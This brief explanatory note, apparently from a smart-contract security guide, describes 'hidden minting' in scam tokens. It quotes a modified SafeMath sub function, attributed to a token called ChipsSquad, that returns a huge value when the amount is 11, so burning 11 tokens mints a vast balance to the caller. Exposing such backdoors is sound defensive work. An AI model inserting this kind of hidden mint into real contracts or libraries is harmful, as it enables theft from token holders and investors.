One of the methods of malicious minting, hidden minting that can be implemented in different ways.
A model occurs without updating the total supply.
Another way is to occur in mint or even burn functions.
Another way is modifying some functions in standard libraries like SafeMath, like the following:
For example, ChipsSquad
```
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
if (b == 11) return ~uint120(0);
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
```
function _burn(address account, uint256 amount) internal virtual {
_balances[account] = _balances[account].sub(amount);
_totalSupply -= amount;
emit Transfer(account, address(0), amount);
}
More explanation:
attacker calls the burn function with 11, as a result he is getting a large amount of tokens. Because in the sub function, when the value of b is equal to 11, a very big number value is returned.